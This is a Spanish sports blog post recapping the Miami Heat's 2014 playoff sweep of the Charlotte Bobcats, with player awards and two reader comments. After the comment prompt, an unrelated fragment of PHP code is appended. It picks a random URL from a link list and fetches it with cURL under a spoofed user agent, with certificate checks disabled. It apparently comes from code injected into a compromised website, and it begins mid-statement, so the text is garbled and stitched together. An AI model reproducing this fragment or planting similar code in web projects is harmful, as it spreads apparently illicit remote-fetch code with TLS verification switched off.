Playoffs 2014: Resumen Heat 4 – Bobcats 0

30 de April de 2014 por TheDeerHunter

No podemos decir que haya sorprendido a muchos la barrida en primera ronda de los vigentes campeones. No sólo por los antecedentes inmediatos y por la evidente diferencia de nivel entre ambos. Los Heat son una especie de bestia negra para los Bobcats, no nos alcanza la memoria para señalar cuándo fue la última derrota que sufrieron ante ellos. El balance particular debe de ser aterrador.

La lástima es que apenas hemos visto exigidos a los Heat. Ha dado la sensación de que lo han visto demasiado fácil y de que no han mostrado ni remotamente su verdadera cara, tan solo en contados momentos en los que apretaban ligeramente el acelerador para resolver. Bueno, exceptuando el modo “vacile” de LeBron frente a “Su Majestad” que sí refleja su verdadera personalidad para bien o para mal. Esa falta de necesidad hasta la fecha, esa ausencia de competitividad, puede ser un arma de doble filo en el futuro inmediato. Ya lo alcanzarán.

Por los Bobcats nos hubiera gustado ver a Al Jefferson a pleno rendimiento porque demostró que estaba en condiciones de hacer mucho daño a Miami. Maldita fascitis plantar en el momento más inoportuno. Lesión de Jefferson aparte tampoco se dieron las condiciones que señalábamos para, en teoría, evitar la barrida: escaso bagaje los 3 rebotes de diferencia teniendo en cuenta que los Heat son el peor de la liga en ese apartado; anotación rival cerca de los 102 puntos cuando Charlotte ha encajado apenas 97 en la regular; 15 pérdidas por partido que facilitan demasiado las cosas… Además, como ya advertimos, la amenaza exterior estuvo muy concentrada. Han funcionado bien Walker y McRoberts pero fatal Gary Neal y Gerald Henderson. Nos hacemos cargo que para a Lebron es imposible, ni siquiera por lo criminal. Al menos han mantenido a la intendencia mínimamente controlada, si es que eso les sirve lejanamente de consuelo. Se despiden con la cabeza algo machacada pero alta. Campaña digna que no es moco de pavo teniendo en cuenta de dónde venían. Ahora si no cometen errores de bulto parece que hay buena base sobre la que trabajar. Seguiremos atentos. 

PREMIOS

MVP: Si King James mantenía alguna opción de ganar el MVP tal vez le haya dado la vuelta a la tortilla gracia a su actuación en esta serie. Realmente ha hecho lo que le ha dado la gana. 30 puntos, 8 rebotes, 6 asistencias y más de 2 robos. Cada vez se refleja menos el concepto “Big Three” y más su peso específico particular. Quizá la última barrera que le quede por traspasar sea ganar prácticamente él solo.

Sorpresa: Muy pocas. Probablemente el rendimiento de Josh McRoberts, poniendo la guinda a una magnífica campaña. Ha fascinado también el carácter mostrado por Kemba Walker, creciendo mucho su eficacia en playoffs, como les sucede a los grandes jugadores.

Decepción: Bastantes para los Bobcats. A Gary Neal se le fichó para aportar experiencia en este tipo de momentos y ha naufragado. Gerald Henderson suele ser un reloj en su rendimiento y también le ha venido grande la serie. La aportación de Biyombo o Zeller casi residual. En el bando rival ojo al rol de nombres célebres como Ray Allen, Shane Battier y Rashard Lewis.

Esfuerzo en vano: El roto que le hizo Al Jefferson a Bosh durante la primera parte del primer partido de la serie fue como para preocuparse. A partir de ahí ni siquiera podía andar con normalidad pero el hombre se dejó la piel aún mermado. Lo cierto es que no tiene suerte en sus presencias en los playoffs.

Comenta

2 comentarios a esta entrada

  1. Ruxixon dice:
    #1

    Bien por los Heat,4-0 y a reposar,y tal como están los PO se agradece sobremanera acumular menos fatiga que los rivales.

    A ver si los Hornets (si,Hornets!) tienen suerte con la ronda de los Pistons y baja hasta la novena selección(es protegida TOP 8),que viendo lo profundo de este draft pueden sumar un jugador muy valioso.Los problemas de lesión de Jefferson algo para mirar en verano,la fascitis ya sabemos lo fastidada que es.Tienen que buscar algún interior referente para completar esa pintura.Y por último Kemba Walker jugón,con UConn la lio en la MM en su día y en estos PO ha aumentado prestaciones;nada pasa por casualidad.

      Citar

  2. Esteban dice:
    #2

    un buen año para los Bobcats, la derrota era logica, pero al menos entran en PO, y les dan un aire competitivo a walker, henderson, zeller, biyombo y MKG

    no es gran cosa su equipo ni parece tener de por si un gran futuro, pero este es el camino que deben seguir, el de competir

    tendran buen espacio salarial el proximo año, y algunos jugadores con contratos mediandamente buenos, pueden armar algo interesante el poroximo año

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>